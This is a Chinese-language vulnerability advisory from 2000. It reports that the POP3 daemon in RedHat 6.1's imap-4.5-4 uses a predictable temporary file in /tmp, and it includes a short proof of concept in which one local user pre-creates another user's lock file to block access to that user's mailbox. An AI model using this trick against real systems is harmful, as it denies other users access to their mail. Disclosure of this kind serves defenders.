发布日期：2000-04-21
更新日期：2000-04-21

受影响系统：

RedHat 6.1附带的imap-4.5-4

描述：

---

对于特定用户，POP3服务通常在/tmp目录中使用同样的临时文件名。因此，
如果这个文件已经存在，POP3守护进程就假设对应的mailbox被锁定，特别是
该临时文件的属主是另外一个用户的时候。

本问题目前只在RedHat6.1上测试验证过。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[alex@alf alex]$ rpm -q imap
imap-4.5-4

假设用户alex对应/tmp/.302.290fe，而用户zane却创建了该文件

[zane@alf /tmp]$ :>.302.290fe
[alex@alf alex]$ telnet 0 110
+OK POP3 localhost v7.59 server ready
user alex
+OK User name accepted, password please
pass xxxxxxxx
-ERR Can't get lock. Mailbox in use
Connection closed by foreign host.
...

<* 来源： Alex Mottram alex@net-connect.net *>


建议：

---

暂无

浏览次数：8197
严重程度：0（网友投票）